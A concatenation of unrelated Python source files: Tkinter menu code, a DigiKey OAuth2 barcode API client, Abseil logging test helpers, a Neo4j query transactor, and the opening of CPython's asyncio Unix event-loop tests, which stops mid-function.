# comVisionMenu4.add_command(label="엠보싱(HSV)", command=embossImageHSV)
# comVisionMenu4.add_separator()
# comVisionMenu4.add_command(label="블러링(RGB)", command=blurrImageRGB)
#
# comVisionMenu5 = Menu(mainMenu)
# mainMenu.add_cascade(label="기타 입출력", menu=comVisionMenu5)
# comVisionMenu5.add_command(label="MySQL에서 불러오기", command=loadMysql)
# comVisionMenu5.add_command(label="MySQL에 저장하기", command=saveMysql)
# comVisionMenu5.add_separator()
# comVisionMenu5.add_command(label="CSV 열기", command=openCSV)
# comVisionMenu5.add_command(label="CSV로 저장", command=saveCSV)
# comVisionMenu5.add_separator()
# comVisionMenu5.add_command(label="엑셀 열기", command=openExcel)
# comVisionMenu5.add_command(label="엑셀로 저장", command=saveExcel)
# comVisionMenu5.add_command(label="엑셀 아트로 저장", command=saveExcelArt)
win.mainloop()
|
dkinterface.py
|
import threading
import configparser
from datetime import datetime
import webbrowser
import http.server
import socketserver
from urllib.parse import parse_qs, urlparse, urlencode
import requests
import ssl
AUTH_RESP_PORT = 4443
class DKAPIInterface:
def __init__(self, auth_complete_callback=None):
# constants
self.CONFIG_FILENAME = "AppData/inventory.ini"
self.CLIENT_ID = ""
self.CLIENT_SECRET = ""
'''
# sandbox
self.REDIRECT_URL = "http://127.0.0.1:{}".format(AUTH_RESP_PORT)
self.AUTH_URL = "https://sandbox-api.digikey.com/v1/oauth2/authorize?"\
"response_type=code&"\
"client_id={}&"\
"redirect_uri={}".format(CLIENT_ID, REDIRECT_URL)
self.ACCESS_URL = "https://sandbox-api.digikey.com/v1/oauth2/token" # same for access and refresh tokens
self.PRODUCT2DBARCODE_URL = "https://sandbox-api.digikey.com/Barcoding/v3/Product2DBarcodes/"
'''
self.REDIRECT_URL = "https://127.0.0.1:{}".format(AUTH_RESP_PORT) # production
self.AUTH_URL = "https://api.digikey.com/v1/oauth2/authorize?" \
"response_type=code&" \
"client_id={}&" \
"redirect_uri={}".format(self.CLIENT_ID, self.REDIRECT_URL)
self.ACCESS_URL = "https://api.digikey.com/v1/oauth2/token" # same for access and refresh tokens
self.PRODUCT2DBARCODE_URL = "https://api.digikey.com/Barcoding/v3/Product2DBarcodes/"
# http server objects to serve the redirect URI at localhost
self.http_handler = None
self.http_thread = None
self.httpd = None
# tokens for the API
self.access_token = ""
self.refresh_token = ""
self.access_token_expiry = 0
self.refresh_token_expiry = 0
self.auth_valid = False
self.refresh_valid = False
# try to read the config file
self.config = configparser.ConfigParser()
open_cfg_ret = self.config.read(self.CONFIG_FILENAME)
# returns a list. If the file exists, the list contains the file name, nothing otherwise.
config_len = len(open_cfg_ret)
if config_len == 0:
self.prompt_app_creation()
if config_len > 0:
# config file is present. Will assume it has the correct content
try: # test for the client credentials
self.CLIENT_ID = self.config["client_cred"]["id"]
self.CLIENT_SECRET = self.config["client_cred"]["secret"]
except KeyError:
self.prompt_app_creation()
self.load_tokens()
# check if the tokens are valid
self.check_access_token()
# callback that gets called when the user authorisation is complete
self.auth_complete_callback = auth_complete_callback
def prompt_app_creation(self):
print("Admin: please create a DigiKey application to use this program. Refer to README for details.")
input("Press Enter to Exit..")
exit(0)
def load_tokens(self):
self.access_token = self.config["tokens"]["access_token"]
self.refresh_token = self.config["tokens"]["refresh_token"]
self.access_token_expiry = int(self.config["tokens"]["access_expiry"])
self.refresh_token_expiry = int(self.config["tokens"]["refresh_expiry"])
def save_tokens(self):
if len(self.config.sections()) == 0: # config file was not present
self.config["tokens"] = {}
self.config["tokens"]["access_token"] = \
"{}".format(self.access_token) # has to store in str
self.config["tokens"]["access_expiry"] = \
"{}".format(self.access_token_expiry)
self.config["tokens"]["refresh_token"] = \
"{}".format(self.refresh_token)
self.config["tokens"]["refresh_expiry"] = \
"{}".format(self.refresh_token_expiry)
# write to file
with open(self.CONFIG_FILENAME, 'w') as f_config:
self.config.write(f_config)
print("Saved auth config")
def authorise(self):
"""
Takes the user through the Digi-Key authorisation process.
:return:
"""
if self.http_thread is None: # server not started
# start the web server to handle the redirected web request after OAuth 2 authorisation completes
self.httpd = socketserver.TCPServer(("127.0.0.1", AUTH_RESP_PORT),
auth_resp_handler_factory(dk_api=self))
# HTTPS code reference: https://gist.github.com/dergachev/7028596
self.httpd.socket = ssl.wrap_socket(self.httpd.socket, certfile="./server.pem", server_side=True)
self.http_thread = threading.Thread(target=self.httpd.serve_forever)
self.http_thread.daemon = True
self.http_thread.start() # run the basic web server in another thread
# start the user browser to begin the authorisation process
webbrowser.open(self.AUTH_URL)
def get_access_token(self, auth_code: str):
"""
Gets the access token from Digi-Key and stores them into the object attributes
:param auth_code: authorisation code for getting the access token
:return: success: bool, True if the operation succeeded
resp: requests.models.response, the full response object in case error occurred
"""
success = False
req_str = "code=" \
"{}&" \
"client_id=" \
"{}&" \
"client_secret=" \
"{}&" \
"redirect_uri=" \
"{}&" \
"grant_type=authorization_code".format(auth_code,
self.CLIENT_ID,
self.CLIENT_SECRET,
self.REDIRECT_URL)
print("Requesting access token...")
access_resp = requests.post(url=self.ACCESS_URL,
headers={'Content-Type': 'application/x-www-form-urlencoded'},
data=req_str)
if access_resp.status_code == 200: # OK
# extract and store tokens
access_resp_json = access_resp.json()
# calculate when the access and refresh tokens will expire
time_now = int(datetime.now().timestamp()) # current time in unix timestamp format
access_expiry = time_now + int(access_resp_json["expires_in"])
refresh_expiry = time_now + int(access_resp_json["refresh_token_expires_in"])
# store tokens
self.access_token = access_resp_json["access_token"]
self.refresh_token = access_resp_json["refresh_token"]
self.access_token_expiry = access_expiry - 10 # offset for some leeway
self.refresh_token_expiry = refresh_expiry - 10
# save into the config file
self.save_tokens()
# update status flag
self.auth_valid = True
self.refresh_valid = True
print("Successfully got the access and refresh tokens:")
print(self.access_token)
success = True
return success, access_resp
def refresh_access_token(self):
success = False
req_str = "client_id=" \
"{}&" \
"client_secret=" \
"{}&" \
"refresh_token=" \
"{}&" \
"grant_type=refresh_token".format(self.CLIENT_ID,
self.CLIENT_SECRET,
self.refresh_token)
print("Requesting refresh token...")
refresh_resp = requests.post(url=self.ACCESS_URL,
headers={'Content-Type': 'application/x-www-form-urlencoded'},
data=req_str)
if refresh_resp.status_code == 200: # OK
# extract and store tokens
refresh_resp_json = refresh_resp.json()
# calculate when the access and refresh tokens will expire
time_now = int(datetime.now().timestamp()) # current time in unix timestamp format
access_expiry = time_now + int(refresh_resp_json["expires_in"])
refresh_expiry = time_now + int(refresh_resp_json["refresh_token_expires_in"])
# store tokens
self.access_token = refresh_resp_json["access_token"]
self.refresh_token = refresh_resp_json["refresh_token"]
self.access_token_expiry = access_expiry - 10 # offset for some leeway
self.refresh_token_expiry = refresh_expiry - 10
print("Successfully got the access and refresh tokens:")
print(self.access_token)
# save into the config file
self.save_tokens()
# update status flag
self.auth_valid = True
self.refresh_valid = True
success = True
return success, refresh_resp
def check_access_token(self):
timestamp_now = int(datetime.now().timestamp())
if timestamp_now > self.refresh_token_expiry: # need to perform another user authorisation
print("Refresh token has expired")
self.refresh_valid = False
else: # refresh token is still valid
self.refresh_valid = True
if timestamp_now > self.access_token_expiry: # access token needs refreshing
print("Access token has expired")
# if the refresh token is expired, the access token will be expired too
self.auth_valid = False
if self.refresh_valid:
success, resp = self.refresh_access_token()
if not success:
print("Failed to refresh the access token! Full response:")
print(resp.json())
else: # successfully refreshed token
print("Successfully refreshed the access token")
self.auth_valid = True
else: # access token is still valid
self.auth_valid = True
def product_2d_barcode(self, dmtx_bytes: bytes):
success = False
self.check_access_token()
encoded_dmtx = urlencode([("", dmtx_bytes)])[1:] # URL encode into an argument pair then trim out the "="
url = "{}{}".format(self.PRODUCT2DBARCODE_URL,
encoded_dmtx)
barcode2d_resp = requests.get(url,
headers={
"accept": "application/json",
"Authorization": "Bearer {}".format(self.access_token),
"X-DIGIKEY-Client-Id": "{}".format(self.CLIENT_ID)
})
if barcode2d_resp.status_code == 200: # OK
success = True
return success, barcode2d_resp
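# A minimal usage sketch (illustrative only; it assumes AppData/inventory.ini already
# holds valid client credentials and that server.pem exists for the local HTTPS redirect
# server). The Data Matrix bytes would normally come from a barcode scanner.
#
#     dk = DKAPIInterface(auth_complete_callback=lambda: print("authorised"))
#     if not dk.auth_valid:
#         dk.authorise()                        # opens the browser for the OAuth2 flow
#     ok, resp = dk.product_2d_barcode(b"...")  # raw Data Matrix bytes
#     if ok:
#         print(resp.json())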
# class factory to link the html handler with the GUI and to pass information around
def auth_resp_handler_factory(dk_api: DKAPIInterface):
class AuthRespHandler(http.server.SimpleHTTPRequestHandler):
"""
This is basically the redirect URI server on localhost
"""
def do_GET(self): # handle the return data from Digi-Key authentication
query = urlparse(self.path).query # query string from the callback URL
auth_results = parse_qs(query, keep_blank_values=True)
resp_html = ""
skip_write_html = False
# check if the auth code is all good
try:
error_message = auth_results["error"]
resp_html = """<p style="text-align: center;"><span style="color: #ff6600;">
<strong>Failed to authorise.</strong></span></p>
<p style="text-align: center;"><span style="color: #000000;">
<strong>Message:
{}
</strong></span></p>
<p style="text-align: center;"><span style="color: #000000;">
<strong>Click <a href="
{}
">here</a> if you would like to try again.</strong></span></p>""".format(
error_message, dk_api.AUTH_URL)
except KeyError: # no error in the response
pass
if resp_html == "": # no error in the response, try get the access and refresh token
try:
auth_code = auth_results["code"][0]
print("Success! Auth code: " + auth_code)
access_success, access_resp = dk_api.get_access_token(auth_code=auth_code)
if access_success: # successfully got the access token
resp_html = """<p style="text-align: center;"><span style="color: #008000;">
<strong>Success!</strong></span></p>
<p style="text-align: center;">You can close this window now.</p>"""
if dk_api.auth_complete_callback is not None:
dk_api.auth_complete_callback()
else:
resp_html = """<p style="text-align: center;"><span style="color: #ff6600;">
<strong>Something went wrong...</strong></span></p>
<p style="text-align: center;"><span style="color: #000000;"><strong>Error code:</strong>
{}
</span></p>
<p style="text-align: center;"><span style="color: #000000;"><strong>Message:</strong>
{}
</span></p>
<p style="text-align: center;"><span style="color: #000000;"><strong>Details:</strong>
{}
</span></p>
<p style="text-align: center;"><span style="color: #000000;">Try again <a href="
{}
">here</a>.</span></p>""".format(access_resp.status_code,
access_resp.json()["ErrorMessage"],
access_resp.json()["ErrorDetails"],
dk_api.AUTH_URL)
print("FAILED:" + str(access_resp.json()))
except KeyError:
skip_write_html = True # not a success request, likely is for favicon
# generate index.html
if not skip_write_html:
with open("index.html", 'w') as f:
f.write(resp_html)
# serve the generated index.html
super().do_GET()
return AuthRespHandler
|
logging_functional_test_helper.py
|
# Copyright 2017 The Abseil Authors.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""Helper script for logging_functional_test."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import logging as std_logging
import os
import sys
import threading
import time
import timeit
from absl import app
from absl import flags
from absl import logging
import mock
from six.moves import xrange # pylint: disable=redefined-builtin
FLAGS = flags.FLAGS
class VerboseDel(object):
"""Dummy class to test __del__ running."""
def __init__(self, msg):
self._msg = msg
def __del__(self):
sys.stderr.write(self._msg)
sys.stderr.flush()
def _test_do_logging():
"""Do some log operations."""
logging.vlog(3, 'This line is VLOG level 3')
logging.vlog(2, 'This line is VLOG level 2')
logging.log(2, 'This line is log level 2')
logging.vlog(1, 'This line is VLOG level 1')
logging.log(1, 'This line is log level 1')
logging.debug('This line is DEBUG')
logging.vlog(0, 'This line is VLOG level 0')
logging.log(0, 'This line is log level 0')
logging.info('Interesting Stuff\0')
logging.info('Interesting Stuff with Arguments: %d', 42)
logging.info('%(a)s Stuff with %(b)s',
{'a': 'Interesting', 'b': 'Dictionary'})
with mock.patch.object(timeit, 'default_timer') as mock_timer:
mock_timer.return_value = 0
while timeit.default_timer() < 9:
logging.log_every_n_seconds(logging.INFO, 'This should appear 5 times.',
2)
mock_timer.return_value = mock_timer() + .2
for i in xrange(1, 5):
logging.log_first_n(logging.INFO, 'Info first %d of %d', 2, i, 2)
logging.log_every_n(logging.INFO, 'Info %d (every %d)', 3, i, 3)
logging.vlog(-1, 'This line is VLOG level -1')
logging.log(-1, 'This line is log level -1')
logging.warning('Worrying Stuff')
for i in xrange(1, 5):
logging.log_first_n(logging.WARNING, 'Warn first %d of %d', 2, i, 2)
logging.log_every_n(logging.WARNING, 'Warn %d (every %d)', 3, i, 3)
logging.vlog(-2, 'This line is VLOG level -2')
logging.log(-2, 'This line is log level -2')
try:
raise OSError('Fake Error')
except OSError:
saved_exc_info = sys.exc_info()
logging.exception('An Exception %s')
logging.exception('Once more, %(reason)s', {'reason': 'just because'})
logging.error('Exception 2 %s', exc_info=True)
logging.error('Non-exception', exc_info=False)
try:
sys.exc_clear()
except AttributeError:
# No sys.exc_clear() in Python 3, but this will clear sys.exc_info() too.
pass
logging.error('Exception %s', '3', exc_info=saved_exc_info)
logging.error('No traceback', exc_info=saved_exc_info[:2] + (None,))
logging.error('Alarming Stuff')
for i in xrange(1, 5):
logging.log_first_n(logging.ERROR, 'Error first %d of %d', 2, i, 2)
logging.log_every_n(logging.ERROR, 'Error %d (every %d)', 3, i, 3)
logging.flush()
def _test_fatal_main_thread_only():
"""Test logging.fatal from main thread, no other threads running."""
v = VerboseDel('fatal_main_thread_only main del called\n')
try:
logging.fatal('fatal_main_thread_only message')
finally:
del v
def _test_fatal_with_other_threads():
"""Test logging.fatal from main thread, other threads running."""
lock = threading.Lock()
lock.acquire()
def sleep_forever(lock=lock):
v = VerboseDel('fatal_with_other_threads non-main del called\n')
try:
lock.release()
while True:
time.sleep(10000)
finally:
del v
v = VerboseDel('fatal_with_other_threads main del called\n')
try:
# Start new thread
t = threading.Thread(target=sleep_forever)
t.start()
# Wait for other thread
lock.acquire()
lock.release()
# Die
logging.fatal('fatal_with_other_threads message')
while True:
time.sleep(10000)
finally:
del v
def _test_fatal_non_main_thread():
"""Test logging.fatal from non main thread."""
lock = threading.Lock()
lock.acquire()
def die_soon(lock=lock):
v = VerboseDel('fatal_non_main_thread non-main del called\n')
try:
# Wait for signal from other thread
lock.acquire()
lock.release()
logging.fatal('fatal_non_main_thread message')
while True:
time.sleep(10000)
finally:
del v
v = VerboseDel('fatal_non_main_thread main del called\n')
try:
# Start new thread
t = threading.Thread(target=die_soon)
t.start()
# Signal other thread
lock.release()
# Wait for it to die
while True:
time.sleep(10000)
finally:
del v
def _test_critical_from_non_absl_logger():
"""Test CRITICAL logs from non-absl loggers."""
std_logging.critical('A critical message')
def _test_register_frame_to_skip():
"""Test skipping frames for line number reporting."""
def _getline():
def _getline_inner():
return logging.get_absl_logger().findCaller()[1]
return _getline_inner()
# Check register_frame_to_skip function to see if log frame skipping works.
line1 = _getline()
line2 = _getline()
logging.get_absl_logger().register_frame_to_skip(__file__, '_getline')
line3 = _getline()
# Both should be line number of the _getline_inner() call.
assert (line1 == line2), (line1, line2)
# line3 should be a line number in this function.
assert (line2 != line3), (line2, line3)
def _test_flush():
"""Test flush in various difficult cases."""
# Flush, but one of the logfiles is closed
log_filename = os.path.join(FLAGS.log_dir, 'a_thread_with_logfile.txt')
with open(log_filename, 'w') as log_file:
logging.get_absl_handler().python_handler.stream = log_file
logging.flush()
def _test_stderrthreshold():
"""Tests modifying --stderrthreshold after flag parsing will work."""
def log_things():
logging.debug('FLAGS.stderrthreshold=%s, debug log', FLAGS.stderrthreshold)
logging.info('FLAGS.stderrthreshold=%s, info log', FLAGS.stderrthreshold)
logging.warning('FLAGS.stderrthreshold=%s, warning log',
FLAGS.stderrthreshold)
logging.error('FLAGS.stderrthreshold=%s, error log', FLAGS.stderrthreshold)
FLAGS.stderrthreshold = 'debug'
log_things()
FLAGS.stderrthreshold = 'info'
log_things()
FLAGS.stderrthreshold = 'warning'
log_things()
FLAGS.stderrthreshold = 'error'
log_things()
def _test_std_logging():
"""Tests logs from std logging."""
std_logging.debug('std debug log')
std_logging.info('std info log')
std_logging.warning('std warning log')
std_logging.error('std error log')
def _test_bad_exc_info():
"""Tests when a bad exc_info valud is provided."""
logging.info('Bad exc_info', exc_info=(None, None))
def _test_none_exc_info():
"""Tests when exc_info is requested but not available."""
# Clear exc_info first.
try:
sys.exc_clear()
except AttributeError:
# No sys.exc_clear() in Python 3, but this will clear sys.exc_info() too.
pass
logging.info('None exc_info', exc_info=True)
def _test_unicode():
"""Tests unicode handling."""
test_names = []
def log(name, msg, *args):
"""Logs the message, and ensures the same name is not logged again."""
assert name not in test_names, ('test_unicode expects unique names to work,'
' found existing name {}').format(name)
test_names.append(name)
    # Add line separators so that tests can verify the output for each log
# message.
sys.stderr.write('-- begin {} --\n'.format(name))
logging.info(msg, *args)
sys.stderr.write('-- end {} --\n'.format(name))
log('unicode', u'G\u00eete: Ch\u00e2tonnaye')
log('unicode % unicode', u'G\u00eete: %s', u'Ch\u00e2tonnaye')
log('bytes % bytes', u'G\u00eete: %s'.encode('utf-8'),
u'Ch\u00e2tonnaye'.encode('utf-8'))
log('unicode % bytes', u'G\u00eete: %s', u'Ch\u00e2tonnaye'.encode('utf-8'))
log('bytes % unicode', u'G\u00eete: %s'.encode('utf-8'), u'Ch\u00e2tonnaye')
log('unicode % iso8859-15', u'G\u00eete: %s',
u'Ch\u00e2tonnaye'.encode('iso-8859-15'))
log('str % exception', 'exception: %s', Exception(u'Ch\u00e2tonnaye'))
def main(argv):
del argv # Unused.
test_name = os.environ.get('TEST_NAME', None)
test_fn = globals().get('_test_%s' % test_name)
if test_fn is None:
raise AssertionError('TEST_NAME must be set to a valid value')
# Flush so previous messages are written to file before we switch to a new
# file with use_absl_log_file.
logging.flush()
if os.environ.get('USE_ABSL_LOG_FILE') == '1':
logging.get_absl_handler().use_absl_log_file('absl_log_file', FLAGS.log_dir)
test_fn()
if __name__ == '__main__':
sys.argv[0] = 'py_argv_0'
app.run(main)
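# Invocation sketch (illustrative only): the functional test drives this helper through
# environment variables, for example:
#
#     TEST_NAME=do_logging USE_ABSL_LOG_FILE=1 \
#         python logging_functional_test_helper.py --log_dir=/tmp/absl_logs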
|
neo4j_transactor.py
|
"""Neo4j Transacotr"""
import logging
import multiprocessing
import pickle
import time
from neo4j import GraphDatabase
from etl import ETL
from loader_common import ContextInfo
class Neo4jTransactor():
"""Neo4j Transactor"""
logger = logging.getLogger(__name__)
count = 0
queue = None
def __init__(self):
self.thread_pool = []
@staticmethod
def _get_name():
return "Neo4jTransactor %s" % multiprocessing.current_process().name
def start_threads(self, thread_count):
"""Start Threads"""
manager = multiprocessing.Manager()
queue = manager.Queue()
Neo4jTransactor.queue = queue
for i in range(0, thread_count):
process = multiprocessing.Process(target=self.run, name=str(i))
process.start()
self.thread_pool.append(process)
def shutdown(self):
"""Shutdown"""
self.logger.info("Shutting down Neo4jTransactor threads: %s", len(self.thread_pool))
for thread in self.thread_pool:
thread.terminate()
self.logger.info("Finished Shutting down Neo4jTransactor threads")
@staticmethod
def execute_query_batch(query_batch):
"""Execture Query Batch"""
Neo4jTransactor.count = Neo4jTransactor.count + 1
Neo4jTransactor.logger.debug("Adding Query Batch: %s BatchSize: %s QueueSize: %s ",
Neo4jTransactor.count,
len(query_batch),
Neo4jTransactor.queue.qsize())
Neo4jTransactor.queue.put((query_batch, Neo4jTransactor.count))
def check_for_thread_errors(self):
"""Check for Thread Errors"""
ETL.wait_for_threads(self.thread_pool, Neo4jTransactor.queue)
@staticmethod
def wait_for_queues():
"""Wait for Queues"""
Neo4jTransactor.queue.join()
def run(self):
"""Run"""
context_info = ContextInfo()
if context_info.env["USING_PICKLE"] is False:
uri = "bolt://" + context_info.env["NEO4J_HOST"] \
+ ":" + str(context_info.env["NEO4J_PORT"])
graph = GraphDatabase.driver(uri, auth=("neo4j", "neo4j"), max_connection_pool_size=-1)
self.logger.info("%s: Starting Neo4jTransactor Thread Runner: ", self._get_name())
while True:
try:
(query_batch, query_counter) = Neo4jTransactor.queue.get()
except EOFError as error:
self.logger.info("Queue Closed exiting: %s", error)
return
self.logger.debug("%s: Processing query batch: %s BatchSize: %s",
self._get_name(),
query_counter,
len(query_batch))
batch_start = time.time()
total_query_counter = 0
while len(query_batch) > 0:
(neo4j_query, filename) = query_batch.pop(0)
self.logger.debug("%s: Processing query for file: %s QueryNum: %s QueueSize: %s",
self._get_name(),
filename,
query_counter,
Neo4jTransactor.queue.qsize())
start = time.time()
try:
if context_info.env["USING_PICKLE"] is True:
                        # Save via pickle rather than writing to Neo4j
file_name = "tmp/temp/transaction_%s_%s" \
% (query_counter, total_query_counter)
with open(file_name, 'wb') as file:
self.logger.debug("Writting to file: tmp/temp/transaction_%s_%s",
query_counter,
total_query_counter)
pickle.dump(neo4j_query, file)
else:
with graph.session() as session:
session.run(neo4j_query)
end = time.time()
elapsed_time = end - start
self.logger.info(\
"%s: Processed query for file: %s QueryNum: %s QueueSize: %s Time: %s",
self._get_name(),
filename,
query_counter,
Neo4jTransactor.queue.qsize(),
time.strftime("%H:%M:%S", time.gmtime(elapsed_time)))
except Exception as error:
self.logger.error(error)
#self.logger.error("%s: Query Failed: %s", self._get_name(), neo4j_query)
# TODO Extract and print NODE information from error message.
# Would be helpful for troubleshooting.
self.logger.warning(\
"%s: Query Conflict, putting data back in Queue to run later. %s",
self._get_name(),
filename)
query_batch.insert(0, (neo4j_query, filename))
time.sleep(12)
Neo4jTransactor.queue.put((query_batch, query_counter))
break
total_query_counter = total_query_counter + 1
batch_end = time.time()
batch_elapsed_time = batch_end - batch_start
self.logger.debug("%s: Query Batch finished: %s BatchSize: %s Time: %s",
self._get_name(),
query_counter,
len(query_batch),
time.strftime("%H:%M:%S", time.gmtime(batch_elapsed_time)))
Neo4jTransactor.queue.task_done()
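# A minimal usage sketch (illustrative only; cypher_query is a placeholder string and a
# reachable Neo4j instance is assumed via the NEO4J_HOST/NEO4J_PORT settings read by
# ContextInfo):
#
#     transactor = Neo4jTransactor()
#     transactor.start_threads(4)
#     Neo4jTransactor.execute_query_batch([(cypher_query, "genes.json")])
#     Neo4jTransactor.wait_for_queues()
#     transactor.check_for_thread_errors()
#     transactor.shutdown()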
|
test_unix_events.py
|
"""Tests for unix_events.py."""
import collections
import contextlib
import errno
import io
import os
import pathlib
import signal
import socket
import stat
import sys
import tempfile
import threading
import unittest
from unittest import mock
from test import support
if sys.platform == 'win32':
raise unittest.SkipTest('UNIX only')
import asyncio
from asyncio import log
from asyncio import base_events
from asyncio import events
from asyncio import unix_events
from test.test_asyncio import utils as test_utils
MOCK_ANY = mock.ANY
def close_pipe_transport(transport):
# Don't call transport.close() because the event loop and the selector
# are mocked
if transport._pipe is None:
return
transport._pipe.close()
transport._pipe = None
@unittest.skipUnless(signal, 'Signals are not supported')
class SelectorEventLoopSignalTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
def test_check_signal(self):
self.assertRaises(
TypeError, self.loop._check_signal, '1')
self.assertRaises(
ValueError, self.loop._check_signal, signal.NSIG + 1)
def test_handle_signal_no_handler(self):
self.loop._handle_signal(signal.NSIG + 1)
def test_handle_signal_cancelled_handler(self):
h = asyncio.Handle(mock.Mock(), (),
loop=mock.Mock())
h.cancel()
self.loop._signal_handlers[signal.NSIG + 1] = h
self.loop.remove_signal_handler = mock.Mock()
self.loop._handle_signal(signal.NSIG + 1)
self.loop.remove_signal_handler.assert_called_with(signal.NSIG + 1)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_setup_error(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.set_wakeup_fd.side_effect = ValueError
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_coroutine_error(self, m_signal):
m_signal.NSIG = signal.NSIG
async def simple_coroutine():
pass
# callback must not be a coroutine function
coro_func = simple_coroutine
coro_obj = coro_func()
self.addCleanup(coro_obj.close)
for func in (coro_func, coro_obj):
self.assertRaisesRegex(
TypeError, 'coroutines cannot be used with add_signal_handler',
self.loop.add_signal_handler,
signal.SIGINT, func)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
cb = lambda: True
self.loop.add_signal_handler(signal.SIGHUP, cb)
h = self.loop._signal_handlers.get(signal.SIGHUP)
self.assertIsInstance(h, asyncio.Handle)
self.assertEqual(h._callback, cb)
@mock.patch('asyncio.unix_events.signal')
def test_add_signal_handler_install_error(self, m_signal):
m_signal.NSIG = signal.NSIG
def set_wakeup_fd(fd):
if fd == -1:
raise ValueError()
m_signal.set_wakeup_fd = set_wakeup_fd
class Err(OSError):
errno = errno.EFAULT
m_signal.signal.side_effect = Err
self.assertRaises(
Err,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error2(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.loop._signal_handlers[signal.SIGHUP] = lambda: True
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(1, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_add_signal_handler_install_error3(self, m_logging, m_signal):
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
m_signal.NSIG = signal.NSIG
self.assertRaises(
RuntimeError,
self.loop.add_signal_handler,
signal.SIGINT, lambda: True)
self.assertFalse(m_logging.info.called)
self.assertEqual(2, m_signal.set_wakeup_fd.call_count)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGHUP))
self.assertTrue(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGHUP, m_signal.SIG_DFL), m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_2(self, m_signal):
m_signal.NSIG = signal.NSIG
m_signal.SIGINT = signal.SIGINT
self.loop.add_signal_handler(signal.SIGINT, lambda: True)
self.loop._signal_handlers[signal.SIGHUP] = object()
m_signal.set_wakeup_fd.reset_mock()
self.assertTrue(
self.loop.remove_signal_handler(signal.SIGINT))
self.assertFalse(m_signal.set_wakeup_fd.called)
self.assertTrue(m_signal.signal.called)
self.assertEqual(
(signal.SIGINT, m_signal.default_int_handler),
m_signal.signal.call_args[0])
@mock.patch('asyncio.unix_events.signal')
@mock.patch('asyncio.base_events.logger')
def test_remove_signal_handler_cleanup_error(self, m_logging, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.set_wakeup_fd.side_effect = ValueError
self.loop.remove_signal_handler(signal.SIGHUP)
self.assertTrue(m_logging.info)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
m_signal.signal.side_effect = OSError
self.assertRaises(
OSError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_remove_signal_handler_error2(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
class Err(OSError):
errno = errno.EINVAL
m_signal.signal.side_effect = Err
self.assertRaises(
RuntimeError, self.loop.remove_signal_handler, signal.SIGHUP)
@mock.patch('asyncio.unix_events.signal')
def test_close(self, m_signal):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.loop.add_signal_handler(signal.SIGCHLD, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 2)
m_signal.set_wakeup_fd.reset_mock()
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
m_signal.set_wakeup_fd.assert_called_once_with(-1)
@mock.patch('asyncio.unix_events.sys')
@mock.patch('asyncio.unix_events.signal')
def test_close_on_finalizing(self, m_signal, m_sys):
m_signal.NSIG = signal.NSIG
self.loop.add_signal_handler(signal.SIGHUP, lambda: True)
self.assertEqual(len(self.loop._signal_handlers), 1)
m_sys.is_finalizing.return_value = True
m_signal.signal.reset_mock()
with self.assertWarnsRegex(ResourceWarning,
"skipping signal handlers removal"):
self.loop.close()
self.assertEqual(len(self.loop._signal_handlers), 0)
self.assertFalse(m_signal.signal.called)
@unittest.skipUnless(hasattr(socket, 'AF_UNIX'),
'UNIX Sockets are not supported')
class SelectorEventLoopUnixSocketTests(test_utils.TestCase):
def setUp(self):
super().setUp()
self.loop = asyncio.SelectorEventLoop()
self.set_event_loop(self.loop)
@support.skip_unless_bind_unix_socket
def test_create_unix_server_existing_path_sock(self):
with test_utils.unix_socket_path() as path:
sock = socket.socket(socket.AF_UNIX)
sock.bind(path)
sock.listen(1)
sock.close()
coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
@support.skip_unless_bind_unix_socket
def test_create_unix_server_pathlib(self):
with test_utils.unix_socket_path() as path:
path = pathlib.Path(path)
srv_coro = self.loop.create_unix_server(lambda: None, path)
srv = self.loop.run_until_complete(srv_coro)
srv.close()
self.loop.run_until_complete(srv.wait_closed())
def test_create_unix_connection_pathlib(self):
